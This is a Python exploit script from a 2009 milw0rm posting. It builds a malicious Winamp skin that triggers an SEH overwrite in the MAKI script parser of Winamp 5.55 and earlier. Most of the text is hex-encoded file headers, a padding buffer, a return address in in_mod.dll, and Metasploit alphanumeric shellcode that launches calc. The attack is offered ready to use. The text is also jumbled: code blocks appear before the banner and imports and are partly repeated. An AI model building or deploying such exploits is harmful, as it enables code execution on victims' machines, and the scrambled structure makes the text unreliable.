"\x00\x01\x00\x00\x00\x00\x01\x1d\x00\x00\x00\x70\x0c\x00\x00\x00\x01\x30\x02\x01"
"\x1b\x00\x00\x00\x01\x0f\x00\x00\x00\x08\x10\x17\x00\x00\x00\x01\x1b\x00\x00\x00"
"\x01\x00\x00\x00\x00\x01\x1e\x00\x00\x00\x70\x0c\x00\x00\x00\x01\x30\x02\x01\x1b"
"\x00\x00\x00\x01\x0f\x00\x00\x00\x08\x10\x12\x00\x00\x00\x01\x1b\x00\x00\x00\x01"
"\x00\x00\x00\x00\x70\x0d\x00\x00\x00\x00\x30\x02\x01\x1b\x00\x00\x00\x21\x01\x01"
"\x00\x00\x00\x21\x21\x01\x01\x00\x00\x00\x21\x21\x01\x01\x00\x00\x00\x21\x21\x01"
"\x01\x00\x00\x00\x21\x21\x01\x01\x00\x00\x00\x21\x21\x01\x01\x00\x00\x00\x21\x21"
"\x01\x01\x00\x00\x00\x21")
skin_xml=(
"\x3c\x3f\x78\x6d\x6c\x20\x76\x65\x72\x73\x69\x6f\x6e\x3d\x22\x31\x2e\x30\x22\x20\x65\x6e\x63\x6f\x64"
"\x69\x6e\x67\x3d\x22\x55\x54\x46\x2d\x38\x22\x20\x73\x74\x61\x6e\x64\x61\x6c\x6f\x6e\x65\x3d\x22\x79"
"\x65\x73\x22\x3f\x3e\x0d\x0a\x0d\x0a\x3c\x57\x69\x6e\x61\x6d\x70\x41\x62\x73\x74\x72\x61\x63\x74\x69"
"\x6f\x6e\x4c\x61\x79\x65\x72\x20\x76\x65\x72\x73\x69\x6f\x6e\x3d\x22\x31\x2e\x33\x34\x22\x3e\x0d\x0a"
"\x09\x3c\x73\x6b\x69\x6e\x69\x6e\x66\x6f\x3e\x0d\x0a\x09\x09\x3c\x76\x65\x72\x73\x69\x6f\x6e\x3e\x31"
"\x2e\x32\x3c\x2f\x76\x65\x72\x73\x69\x6f\x6e\x3e\x0d\x0a\x09\x09\x3c\x6e\x61\x6d\x65\x3e\x42\x65\x6e"
"\x74\x6f\x3c\x2f\x6e\x61\x6d\x65\x3e\x0d\x0a\x09\x09\x3c\x61\x75\x74\x68\x6f\x72\x3e\x48\x69\x73\x30"
"\x6b\x34\x3c\x2f\x61\x75\x74\x68\x6f\x72\x3e\x0d\x0a\x09\x09\x3c\x63\x6f\x6d\x6d\x65\x6e\x74\x3e\x48"
"\x69\x73\x30\x6b\x34\x3c\x2f\x63\x6f\x6d\x6d\x65\x6e\x74\x3e\x0d\x0a\x09\x09\x3c\x65\x6d\x61\x69\x6c"
"\x3e\x48\x69\x73\x30\x6b\x34\x2e\x68\x6c\x6d\x40\x67\x6d\x61\x69\x6c\x2e\x63\x6f\x6d\x3c\x2f\x65\x6d"
"\x61\x69\x6c\x3e\x0d\x0a\x09\x09\x3c\x73\x63\x72\x65\x65\x6e\x73\x68\x6f\x74\x3e\x48\x69\x73\x30\x6b"
"\x34\x2e\x70\x6e\x67\x3c\x2f\x73\x63\x72\x65\x65\x6e\x73\x68\x6f\x74\x3e\x0d\x0a\x09\x09\x3c\x68\x6f"
"\x6d\x65\x70\x61\x67\x65\x3e\x68\x74\x74\x70\x3a\x2f\x2f\x77\x77\x77\x2e\x73\x6e\x61\x6b\x65\x73\x70"
"\x63\x2e\x63\x6f\x6d\x2f\x3c\x2f\x68\x6f\x6d\x65\x70\x61\x67\x65\x3e\x0d\x0a\x09\x3c\x2f\x73\x6b\x69"
"\x6e\x69\x6e\x66\x6f\x3e\x0d\x0a\x0d\x0a\x09\x3c\x61\x63\x63\x65\x6c\x65\x72\x61\x74\x6f\x72\x73\x20"
"\x73\x65\x63\x74\x69\x6f\x6e\x3d\x22\x67\x65\x6e\x65\x72\x61\x6c\x22\x3e\x0d\x0a\x09\x09\x3c\x61\x63"
"\x63\x65\x6c\x65\x72\x61\x74\x6f\x72\x20\x62\x69\x6e\x64\x3d\x22\x41\x6c\x74\x2b\x46\x22\x20\x61\x63"
"\x74\x69\x6f\x6e\x3d\x22\x4d\x45\x4e\x55\x48\x4f\x54\x4b\x45\x59\x5f\x46\x49\x4c\x45\x22\x20\x2f\x3e"
"\x0d\x0a\x09\x09\x3c\x61\x63\x63\x65\x6c\x65\x72\x61\x74\x6f\x72\x20\x62\x69\x6e\x64\x3d\x22\x41\x6c"
"\x74\x2b\x50\x22\x20\x61\x63\x74\x69\x6f\x6e\x3d\x22\x4d\x45\x4e\x55\x48\x4f\x54\x4b\x45\x59\x5f\x50"
"\x4c\x41\x59\x22\x20\x2f\x3e\x0d\x0a\x09\x09\x3c\x61\x63\x63\x65\x6c\x65\x72\x61\x74\x6f\x72\x20\x62"
"\x69\x6e\x64\x3d\x22\x41\x6c\x74\x2b\x4f\x22\x20\x61\x63\x74\x69\x6f\x6e\x3d\x22\x4d\x45\x4e\x55\x48"
"\x4f\x54\x4b\x45\x59\x5f\x4f\x50\x54\x49\x4f\x4e\x53\x22\x20\x2f\x3e\x0d\x0a\x09\x09\x3c\x61\x63\x63"
"\x65\x6c\x65\x72\x61\x74\x6f\x72\x20\x62\x69\x6e\x64\x3d\x22\x41\x6c\x74\x2b\x49\x22\x20\x61\x63\x74"
"\x69\x6f\x6e\x3d\x22\x4d\x45\x4e\x55\x48\x4f\x54\x4b\x45\x59\x5f\x56\x49\x45\x57\x22\x20\x2f\x3e\x0d"
"\x0a\x09\x09\x3c\x61\x63\x63\x65\x6c\x65\x72\x61\x74\x6f\x72\x20\x62\x69\x6e\x64\x3d\x22\x41\x6c\x74"
"\x2b\x48\x22\x20\x61\x63\x74\x69\x6f\x6e\x3d\x22\x4d\x45\x4e\x55\x48\x4f\x54\x4b\x45\x59\x5f\x48\x45"
"\x4c\x50\x22\x20\x2f\x3e\x0d\x0a\x09\x3c\x2f\x61\x63\x63\x65\x6c\x65\x72\x61\x74\x6f\x72\x73\x3e\x0d"
"\x0a\x0d\x0a\x09\x3c\x61\x63\x63\x65\x6c\x65\x72\x61\x74\x6f\x72\x73\x20\x73\x65\x63\x74\x69\x6f\x6e"
"\x3d\x22\x6e\x6f\x72\x6d\x61\x6c\x22\x3e\x0d\x0a\x09\x09\x09\x3c\x61\x63\x63\x65\x6c\x65\x72\x61\x74"
"\x6f\x72\x20\x62\x69\x6e\x64\x3d\x22\x73\x70\x61\x63\x65\x22\x20\x61\x63\x74\x69\x6f\x6e\x3d\x22\x53"
"\x48\x4f\x57\x5f\x43\x55\x52\x52\x45\x4e\x54\x5f\x54\x52\x41\x43\x4b\x22\x20\x2f\x3e\x0d\x0a\x09\x3c"
"\x2f\x61\x63\x63\x65\x6c\x65\x72\x61\x74\x6f\x72\x73\x3e\x0d\x0a\x0d\x0a\x09\x3c\x21\x2d\x2d\x20\x54"
"\x68\x69\x73\x20\x53\x6b\x69\x6e\x20\x75\x73\x65\x73\x20\x73\x68\x61\x72\x65\x64\x20\x47\x72\x61\x70"
"\x68\x69\x63\x73\x2c\x20\x58\x4d\x4c\x20\x61\x6e\x64\x20\x4d\x61\x6b\x69\x20\x66\x72\x6f\x6d\x20\x27"
"\x42\x69\x67\x20\x42\x65\x6e\x74\x6f\x27\x20\x2d\x2d\x3e\x0d\x0a\x0d\x0a\x09\x3c\x73\x63\x72\x69\x70"
"\x74\x73\x3e\x0d\x0a\x09\x09\x3c\x73\x63\x72\x69\x70\x74\x20\x66\x69\x6c\x65\x3d\x22\x2f\x73\x63\x72"
"\x69\x70\x74\x73\x2f\x32\x37\x2e\x6d\x61\x6b\x69\x22\x20\x70\x61\x72\x61\x6d\x3d\x22\x73\x6d\x61\x6c"
"\x6c\x22\x2f\x3e\x20\x3c\x21\x2d\x2d\x20\x4d\x75\x73\x74\x20\x62\x65\x20\x6c\x6f\x61\x64\x65\x64\x20"
"\x61\x74\x20\x66\x69\x72\x73\x74\x20\x2d\x2d\x3e\x0d\x0a\x09\x3c\x2f\x73\x63\x72\x69\x70\x74\x73\x3e"
"\x0d\x0a\x0d\x0a\x3c\x2f\x57\x69\x6e\x61\x6d\x70\x41\x62\x73\x74\x72\x61\x63\x74\x69\x6f\x6e\x4c\x61"
"\x79\x65\x72\x3e")
# win32_exec - EXITFUNC=seh CMD=calc Size=343 Encoder=PexAlphaNum http://metasploit.com
shellcode=(
"\xeb\x03\x59\xeb\x05\xe8\xf8\xff\xff\xff\x4f\x49\x49\x49\x49\x49"
"\x49\x51\x5a\x56\x54\x58\x36\x33\x30\x56\x58\x34\x41\x30\x42\x36"
"\x48\x48\x30\x42\x33\x30\x42\x43\x56\x58\x32\x42\x44\x42\x48\x34"
"\x41\x32\x41\x44\x30\x41\x44\x54\x42\x44\x51\x42\x30\x41\x44\x41"
"\x56\x58\x34\x5a\x38\x42\x44\x4a\x4f\x4d\x4e\x4f\x4a\x4e\x46\x34"
"\x42\x50\x42\x30\x42\x50\x4b\x38\x45\x44\x4e\x53\x4b\x48\x4e\x47"
"\x45\x30\x4a\x57\x41\x50\x4f\x4e\x4b\x48\x4f\x54\x4a\x31\x4b\x38"
"\x4f\x55\x42\x32\x41\x30\x4b\x4e\x49\x54\x4b\x58\x46\x33\x4b\x48"
"\x41\x30\x50\x4e\x41\x53\x42\x4c\x49\x39\x4e\x4a\x46\x48\x42\x4c"
"\x46\x37\x47\x30\x41\x4c\x4c\x4c\x4d\x50\x41\x50\x44\x4c\x4b\x4e"
"\x46\x4f\x4b\x43\x46\x45\x46\x32\x46\x30\x45\x47\x45\x4e\x4b\x58"
"\x4f\x45\x46\x52\x41\x50\x4b\x4e\x48\x36\x4b\x48\x4e\x50\x4b\x44"
"\x4b\x58\x4f\x55\x4e\x51\x41\x50\x4b\x4e\x4b\x58\x4e\x51\x4b\x48"
"\x41\x30\x4b\x4e\x49\x48\x4e\x45\x46\x32\x46\x30\x43\x4c\x41\x53"
"\x42\x4c\x46\x46\x4b\x58\x42\x54\x42\x33\x45\x58\x42\x4c\x4a\x57"
"\x4e\x30\x4b\x58\x42\x34\x4e\x50\x4b\x48\x42\x37\x4e\x51\x4d\x4a"
"\x4b\x48\x4a\x36\x4a\x30\x4b\x4e\x49\x30\x4b\x48\x42\x38\x42\x4b"
"\x42\x30\x42\x30\x42\x30\x4b\x58\x4a\x46\x4e\x43\x4f\x55\x41\x43"
"\x48\x4f\x42\x46\x48\x45\x49\x58\x4a\x4f\x43\x38\x42\x4c\x4b\x47"
"\x42\x35\x4a\x46\x42\x4f\x4c\x38\x46\x30\x4f\x35\x4a\x46\x4a\x39"
"\x50\x4f\x4c\x58\x50\x50\x47\x35\x4f\x4f\x47\x4e\x43\x46\x41\x56"
"\x4e\x56\x43\x46\x42\x50\x5a")
payload = "\x41"*16756
payload += "\x74\x06\x90\x90"
payload += "\x32\x55\xF0\x12" # universal p/p/r in_mod.dll
payload += shellcode
try:
os.mkdir("dz_skin")
os.mkdir("dz_skin/scripts")
out_maki = open(r'dz_skin/scripts/27.maki', 'w')
out_maki.write(header1+payload+header2)
out_maki.close()
out_xml = open(r'dz_skin/skin.xml', 'w')
out_xml.write(skin_xml)
out_xml.close()
raw_input("\nSkin's files created!\n")
except:
print "Error"
# milw0rm.com [2009-05-22]
#usage: python winamp_maki_script.py
#Note : I got problem while using this python file under windows,but it works great under ubuntu :p
print "**************************************************************************"
print " Winamp <= 5.55 (MAKI script) Universal Seh Overwrite Exploit\n"
print " Advisory : http://vrt-sourcefire.blogspot.com/2009/05/winamp-maki-parsing-vulnerability.html\n"
print " Exploit code: His0k4\n"
print " Tested on: Windows XP Pro SP3 (EN)\n"
print " Greetings to:"
print " All friends & muslims HaCkers(dz),snakespc.com\n"
print " Serra7 Merra7,Koulchi Mderra7\n"
print "**************************************************************************"
import os
header1=(
"\x46\x47\x03\x04\x17\x00\x00\x00\x27\x00\x00\x00\x71\x49\x65\x51\x87\x0d\x51\x4a"
"\x91\xe3\xa6\xb5\x32\x35\xf3\xe7\x64\x0f\xf5\xd6\xfa\x93\xb7\x49\x93\xf1\xba\x66"
"\xef\xae\x3e\x98\x7b\xc4\x0d\xe9\x0d\x84\xe7\x4a\xb0\x2c\x04\x0b\xd2\x75\xf7\xfc"
"\xb5\x3a\x02\xb2\x4d\x43\xa1\x4b\xbe\xae\x59\x63\x75\x03\xf3\xc6\x78\x57\xc6\x87"
"\x43\xe7\xfe\x49\x85\xf9\x09\xcc\x53\x2a\xfd\x56\x65\x36\x60\x38\x1b\x46\xa7\x42"
"\xaa\x75\xd8\x3f\x66\x67\xbf\x73\xf4\x7a\x78\xf4\xbb\xb2\xf7\x4e\x9c\xfb\xe7\x4b"
"\xa9\xbe\xa8\x8d\x02\x0c\x37\x3a\xbf\x3c\x9f\x43\x84\xf1\x86\x88\x5b\xcf\x1e\x36"
"\xb6\x5b\x0c\x5d\xe1\x7d\x1f\x4b\xa7\x0f\x8d\x16\x59\x94\x19\x41\x99\xe1\xe3\x4e"
"\x36\xc6\xec\x4b\x97\xcd\x78\xbc\x9c\x86\x28\xb0\xe5\x95\xbe\x45\x72\x20\x91\x41"
"\x93\x5c\xbb\x5f\xf9\xf1\x17\xfd\x4e\x6d\x90\x60\x7e\x53\x2e\x48\xb0\x04\xcc\x94"
"\x61\x88\x56\x72\xc0\xbc\x3a\x40\x22\x6f\xd6\x4b\x8b\xa4\x10\xc8\x29\x93\x25\x47"
"\x4d\x3e\xaa\x97\xd0\xf4\xa8\x4f\x81\x7b\x0a\xf2\x2a\x45\x49\x83\xfa\xbb\xe4\x64"
"\xf4\x81\xd9\x49\xb0\xc0\xa8\x5b\x2e\xc3\xbc\xfd\x3f\x5e\xb6\x62\x5e\x37\x8d\x40"
"\x8d\xea\x76\x81\x4a\xb9\x1b\x77\xbe\x97\x4f\xce\xb0\x77\x19\x4e\x99\x56\xd4\x98"
"\x33\xc9\x6c\x27\x0d\x20\xc2\xa8\xeb\x51\x2a\x4b\xba\x7f\x5d\x4b\xc6\x5d\x4c\x71"
"\x38\xba\x1e\x8d\x9e\x48\x3e\x48\xb9\x60\x8d\x1f\x43\xc5\xc4\x05\x40\xc9\x08\x0f"
"\x39\xaf\x23\x4b\x80\xf3\xb8\xc4\x8f\x7e\xbb\x59\x72\x86\xaa\xef\x0e\x31\xfa\x41"
"\xb7\xdc\x85\xa9\x52\x5b\xcb\x4b\x44\x32\xfd\x7d\x51\x37\x7c\x4e\xbf\x40\x82\xae"
"\x5f\x3a\xdc\x33\x15\xfa\xb9\x5a\x7d\x9a\x57\x45\xab\xc8\x65\x57\xa6\xc6\x7c\xa9"
"\xcd\xdd\x8e\x69\x1e\x8f\xec\x4f\x9b\x12\xf9\x44\xf9\x09\xff\x45\x27\xcd\x64\x6b"
"\x26\x5a\x4b\x4c\x8c\x59\xe6\xa7\x0c\xf6\x49\x3a\xe4\x05\xcb\x6d\xc4\x8a\xc2\x48"
"\xb1\x93\x49\xf0\x91\x0e\xf5\x4a\xff\xcf\xdc\xb4\xfe\x81\xcc\x4b\x96\x1b\x72\x0f"
"\xd5\xbe\x0f\xff\xe1\x8c\xe2\x01\x59\xb0\xd5\x11\x97\x9f\xe4\xde\x6f\x51\x76\x0a"
"\xbd\xf8\xf0\x80\xa5\x1b\xa6\x42\xa0\x93\x32\x36\xa0\x0c\x8d\x4a\x1b\x34\x2e\x9b"
"\x98\x6c\xfa\x40\x8b\x85\x0c\x1b\x6e\xe8\x94\x05\x71\x9b\xd5\x36\xfd\x03\xf8\x4a"
"\x97\x95\x05\x02\xb7\xdb\x26\x7a\x10\xf2\xd5\x7f\xc4\xac\xdf\x48\xa6\xa0\x54\x51"
"\x57\x6c\xdc\x76\x35\xa5\xba\xb5\xb3\x05\xcb\x4d\xad\xc1\xe6\x18\xd2\x8f\x68\x96"
"\xc1\xfe\x29\x61\xb7\xda\x51\x4d\x91\x65\x01\xca\x0c\x1b\x70\xdb\xf7\x14\x95\xd5"
"\x36\xed\xe8\x45\x98\x0f\x3f\x4e\xa0\x52\x2c\xd9\x82\x4b\x3b\x9b\x7a\x66\x0e\x42"
"\x8f\xfc\x79\x41\x15\x80\x9c\x02\x99\x31\xed\xc7\x19\x53\x98\x47\x98\x63\x60\xb1"
"\x5a\x29\x8c\xaa\x4d\xc1\xbb\xe2\xf6\x84\x73\x41\xbd\xb3\xb2\xeb\x2f\x66\x55\x50"
"\x94\x05\xc0\x73\x1f\x96\x1b\x40\x9b\x1b\x67\x24\x27\xac\x41\x65\x0e\x00\x00\x00"
"\x01\x01\x00\x00\xab\xb0")
header2=(
"\x01\x01\x00\x00\x0b\x00\x67\x65\x74\x53\x6b\x69\x6e\x4e\x61\x6d\x65\x01\x01\x00"
"\x00\x0d\x00\x67\x65\x74\x50\x72\x69\x76\x61\x74\x65\x49\x6e\x74\x01\x01\x00\x00"
"\x0c\x00\x67\x65\x74\x54\x69\x6d\x65\x4f\x66\x44\x61\x79\x01\x01\x00\x00\x0d\x00"
"\x73\x65\x74\x50\x72\x69\x76\x61\x74\x65\x49\x6e\x74\x01\x01\x00\x00\x0a\x00\x6d"
"\x65\x73\x73\x61\x67\x65\x42\x6f\x78\x01\x01\x00\x00\x0f\x00\x69\x6e\x74\x65\x67"
"\x65\x72\x54\x6f\x53\x74\x72\x69\x6e\x67\x01\x01\x00\x00\x0e\x00\x6f\x6e\x53\x63"
"\x72\x69\x70\x74\x4c\x6f\x61\x64\x65\x64\x01\x01\x00\x00\x0e\x00\x67\x65\x74\x53"
"\x63\x72\x69\x70\x74\x47\x72\x6f\x75\x70\x0a\x01\x00\x00\x09\x00\x67\x65\x74\x4f"
"\x62\x6a\x65\x63\x74\x17\x01\x00\x00\x0b\x00\x6f\x6e\x4c\x65\x66\x74\x43\x6c\x69"
"\x63\x6b\x01\x01\x00\x00\x12\x00\x6e\x61\x76\x69\x67\x61\x74\x65\x55\x72\x6c\x42"
"\x72\x6f\x77\x73\x65\x72\x01\x01\x00\x00\x19\x00\x67\x65\x74\x50\x6c\x61\x79\x49"
"\x74\x65\x6d\x4d\x65\x74\x61\x44\x61\x74\x61\x53\x74\x72\x69\x6e\x67\x01\x01\x00"
"\x00\x17\x00\x67\x65\x74\x50\x6c\x61\x79\x49\x74\x65\x6d\x44\x69\x73\x70\x6c\x61"
"\x79\x54\x69\x74\x6c\x65\x1f\x00\x00\x00\x01\x01\x00\x00\x00\x00\x00\x00\x00\x00"
"\x00\x00\x01\x01\x02\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x01\x00\x02\x00"
"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x01\x00\x04\x00\x00\x00\x00\x00\x00\x00"
"\x00\x00\x00\x00\x00\x00\x02\x00\x00\x00\x02\x00\x00\x00\x00\x00\x00\x00\x00\x00"
"\x02\x00\x00\x00\xff\xff\x00\x00\x00\x00\x00\x00\x00\x00\x02\x00\x00\x00\x01\x00"
"\x00\x00\x00\x00\x00\x00\x00\x00\x06\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
"\x00\x00\x02\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x02\x00\x00\x00"
"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x02\x00\x00\x00\x00\x00\x00\x00\x00\x00"
"\x00\x00\x00\x00\x02\x00\x00\x00\x88\x13\x00\x00\x00\x00\x00\x00\x00\x00\x06\x00"
"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x06\x00\x00\x00\x00\x00\x00\x00"
"\x00\x00\x00\x00\x00\x00\x06\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
"\x06\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x06\x00\x00\x00\x00\x00"
"\x00\x00\x00\x00\x00\x00\x00\x00\x06\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
"\x00\x00\x02\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x17\x01\x00\x00"
"\x00\x00\x00\x00\x00\x00\x00\x00\x01\x00\x06\x00\x00\x00\x00\x00\x00\x00\x00\x00"
"\x00\x00\x00\x00\x06\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x06\x00"
"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x06\x00\x00\x00\x00\x00\x00\x00"
"\x00\x00\x00\x00\x00\x00\x06\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
"\x06\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x06\x00\x00\x00\x00\x00"
"\x00\x00\x00\x00\x00\x00\x00\x00\x06\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
"\x00\x00\x06\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x06\x00\x00\x00"
"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x06\x00\x00\x00\x00\x00\x00\x00\x00\x00"
"\x00\x00\x00\x00\x0e\x00\x00\x00\x07\x00\x00\x00\x0c\x00\x72\x75\x6e\x74\x69\x6d"
"\x65\x63\x68\x65\x63\x6b\x0c\x00\x00\x00\x15\x00\x54\x68\x69\x73\x20\x73\x63\x72"
"\x69\x70\x74\x20\x72\x65\x71\x75\x69\x72\x65\x73\x20\x0d\x00\x00\x00\x1f\x00\x57"
"\x69\x6e\x61\x6d\x70\x20\x35\x2e\x35\x34\x20\x28\x73\x6b\x69\x6e\x20\x76\x65\x72"
"\x73\x69\x6f\x6e\x20\x31\x2e\x33\x34\x29\x0e\x00\x00\x00\x05\x00\x45\x72\x72\x6f"
"\x72\x0f\x00\x00\x00\x00\x00\x11\x00\x00\x00\x05\x00\x44\x45\x42\x55\x47\x14\x00"
"\x00\x00\x0a\x00\x6e\x6f\x77\x70\x6c\x61\x79\x69\x6e\x67\x16\x00\x00\x00\x12\x00"
"\x77\x69\x6e\x73\x68\x61\x64\x65\x69\x63\x6f\x6e\x6d\x6f\x64\x65\x72\x6e\x18\x00"
"\x00\x00\x31\x00\x68\x74\x74\x70\x3a\x2f\x2f\x63\x6c\x69\x65\x6e\x74\x2e\x77\x69"
"\x6e\x61\x6d\x70\x2e\x63\x6f\x6d\x2f\x6e\x6f\x77\x70\x6c\x61\x79\x69\x6e\x67\x2f"
"\x61\x72\x74\x69\x73\x74\x2f\x3f\x69\x63\x69\x64\x3d\x19\x00\x00\x00\x0c\x00\x26"
"\x61\x72\x74\x69\x73\x74\x4e\x61\x6d\x65\x3d\x1a\x00\x00\x00\x06\x00\x61\x72\x74"
"\x69\x73\x74\x1c\x00\x00\x00\x0b\x00\x75\x76\x6f\x78\x2f\x61\x72\x74\x69\x73\x74"
"\x1d\x00\x00\x00\x0a\x00\x63\x62\x73\x2f\x61\x72\x74\x69\x73\x74\x1e\x00\x00\x00"
"\x0b\x00\x73\x74\x72\x65\x61\x6d\x74\x69\x74\x6c\x65\x02\x00\x00\x00\x00\x00\x00"
"\x00\x07\x00\x00\x00\x53\x01\x00\x00\x13\x00\x00\x00\x0a\x00\x00\x00\x86\x01\x00"
"\x00\xd1\x02\x00\x00\x01\x03\x00\x00\x00\x01\x00\x00\x00\x00\x18\x00\x00\x00\x00"
"\x30\x02\x01\x03\x00\x00\x00\x01\x04\x00\x00\x00\x0c\x01\x03\x00\x00\x00\x01\x05"
"\x00\x00\x00\x0a\x51\x10\xb9\x00\x00\x00\x01\x02\x00\x00\x00\x01\x06\x00\x00\x00"
"\x30\x02\x01\x09\x00\x00\x00\x01\x00\x00\x00\x00\x01\x08\x00\x00\x00\x01\x07\x00"
"\x00\x00\x01\x00\x00\x00\x00\x18\x01\x00\x00\x00\x18\x02\x00\x00\x00\x30\x02\x01"
"\x0a\x00\x00\x00\x01\x00\x00\x00\x00\x18\x03\x00\x00\x00\x30\x02\x01\x0a\x00\x00"
"\x00\x01\x09\x00\x00\x00\x41\x01\x0b\x00\x00\x00\x0c\x01\x09\x00\x00\x00\x01\x0a"
"\x00\x00\x00\x0c\x50\x10\x06\x00\x00\x00\x01\x08\x00\x00\x00\x21\x01\x00\x00\x00"
"\x00\x01\x00\x00\x00\x00\x18\x03\x00\x00\x00\x01\x07\x00\x00\x00\x01\x00\x00\x00"
"\x00\x18\x01\x00\x00\x00\x18\x04\x00\x00\x00\x02\x01\x00\x00\x00\x00\x01\x0f\x00"
"\x00\x00\x01\x06\x00\x00\x00\x01\x0e\x00\x00\x00\x01\x0c\x00\x00\x00\x01\x0d\x00"
"\x00\x00\x40\x18\x05\x00\x00\x00\x02\x01\x08\x00\x00\x00\x21\x01\x06\x00\x00\x00"
"\x21\x01\x01\x00\x00\x00\x21\x03\x10\x00\x00\x00\x01\x00\x00\x00\x00\x01\x0f\x00"
"\x00\x00\x01\x08\x00\x00\x00\x01\x11\x00\x00\x00\x01\x10\x00\x00\x00\x70\x05\x00"
"\x00\x00\x04\x02\x01\x01\x00\x00\x00\x21\x03\x12\x00\x00\x00\x01\x00\x00\x00\x00"
"\x01\x0f\x00\x00\x00\x01\x08\x00\x00\x00\x01\x11\x00\x00\x00\x01\x00\x00\x00\x00"
"\x01\x12\x00\x00\x00\x70\x06\x00\x00\x00\x01\x70\x05\x00\x00\x00\x04\x02\x01\x01"
"\x00\x00\x00\x21\x19\xa8\xfe\xff\xff\x11\x06\x00\x00\x00\x01\x01\x00\x00\x00\x21"
"\x01\x13\x00\x00\x00\x01\x00\x00\x00\x00\x70\x08\x00\x00\x00\x00\x01\x14\x00\x00"
"\x00\x70\x09\x00\x00\x00\x01\x30\x02\x01\x01\x00\x00\x00\x21\x01\x02\x00\x00\x00"
"\x10\x06\x00\x00\x00\x01\x01\x00\x00\x00\x21\x01\x15\x00\x00\x00\x19\x4d\x00\x00"
"\x00\x30\x02\x01\x15\x00\x00\x00\x01\x0f\x00\x00\x00\x08\x10\x06\x00\x00\x00\x01"
"\x01\x00\x00\x00\x21\x01\x17\x00\x00\x00\x01\x16\x00\x00\x00\x30\x02\x01\x00\x00"
"\x00\x00\x01\x18\x00\x00\x00\x01\x17\x00\x00\x00\x40\x01\x19\x00\x00\x00\x40\x01"
"\x15\x00\x00\x00\x40\x70\x0b\x00\x00\x00\x01\x02\x01\x01\x00\x00\x00\x21\x01\x1b"
"\x00\x00\x00\x01\x00\x00\x00\x00\x01\x1a\x00\x00\x00\x70\x0c\x00\x00\x00\x01\x30"
"\x02\x01\x1b\x00\x00\x00\x01\x0f\x00\x00\x00\x08\x10\x17\x00\x00\x00\x01\x1b\x00"
"\x00\x00\x01\x00\x00\x00\x00\x01\x1c\x00\x00\x00\x70\x0c\x00\x00\x00\x01\x30\x02"
"\x01\x1b\x00\x00\x00\x01\x0f\x00\x00\x00\x08\x10\x17\x00\x00\x00\x01\x1b\x00\x00"
"\x00\x01\x00\x00\x00\x00\x01\x1d\x00\x00\x00\x70\x0c\x00\x00\x00\x01\x30\x02\x01"
"\x1b\x00\x00\x00\x01\x0f\x00\x00\x00\x08\x10\x17\x00\x00\x00\x01\x1b\x00\x00\x00"
"\x01\x00\x00\x00\x00\x01\x1e\x00\x00\x00\x70\x0c\x00\x00\x00\x01\x30\x02\x01\x1b"
"\x00\x00\x00\x01\x0f\x00\x00\x00\x08\x10\x12\x00\x00\x00\x01\x1b\x00\x00\x00\x01"
"\x00\x00\x00\x00\x70\x0d\x00\x00\x00\x00\x30\x02\x01\x1b\x00\x00\x00\x21\x01\x01"
"\x00\x00\x00\x21\x21\x01\x01\x00\x00\x00\x21\x21\x01\x01\x00\x00\x00\x21\x21\x01"
"\x01\x00\x00\x00\x21\x21\x01\x01\x00\x00\x00\x21\x21\x01\x01\x00\x00\x00\x21\x21"
"\x01\x01\x00\x00\x00\x21")
skin_xml=(
"\x3c\x3f\x78\x6d\x6c\x20\x76\x65\x72\x73\x69\x6f\x6e\x3d\x22\x31\x2e\x30\x22\x20\x65\x6e\x63\x6f\x64"
"\x69\x6e\x67\x3d\x22\x55\x54\x46\x2d\x38\x22\x20\x73\x74\x61\x6e\x64\x61\x6c\x6f\x6e\x65\x3d\x22\x79"
"\x65\x73\x22\x3f\x3e\x0d\x0a\x0d\x0a\x3c\x57\x69\x6e\x61\x6d\x70\x41\x62\x73\x74\x72\x61\x63\x74\x69"
"\x6f\x6e\x4c\x61\x79\x65\x72\x20\x76\x65\x72\x73\x69\x6f\x6e\x3d\x22\x31\x2e\x33\x34\x22\x3e\x0d\x0a"
"\x09\x3c\x73\x6b\x69\x6e\x69\x6e\x66\x6f\x3e\x0d\x0a\x09\x09\x3c\x76\x65\x72\x73\x69\x6f\x6e\x3e\x31"
"\x2e\x32\x3c\x2f\x76\x65\x72\x73\x69\x6f\x6e\x3e\x0d\x0a\x09\x09\x3c\x6e\x61\x6d\x65\x3e\x42\x65\x6e"
"\x74\x6f\x3c\x2f\x6e\x61\x6d\x65\x3e\x0d\x0a\x09\x09\x3c\x61\x75\x74\x68\x6f\x72\x3e\x48\x69\x73\x30"
"\x6b\x34\x3c\x2f\x61\x75\x74\x68\x6f\x72\x3e\x0d\x0a\x09\x09\x3c\x63\x6f\x6d\x6d\x65\x6e\x74\x3e\x48"
"\x69\x73\x30\x6b\x34\x3c\x2f\x63\x6f\x6d\x6d\x65\x6e\x74\x3e\x0d\x0a\x09\x09\x3c\x65\x6d\x61\x69\x6c"
"\x3e\x48\x69\x73\x30\x6b\x34\x2e\x68\x6c\x6d\x40\x67\x6d\x61\x69\x6c\x2e\x63\x6f\x6d\x3c\x2f\x65\x6d"
"\x61\x69\x6c\x3e\x0d\x0a\x09\x09\x3c\x73\x63\x72\x65\x65\x6e\x73\x68\x6f\x74\x3e\x48\x69\x73\x30\x6b"
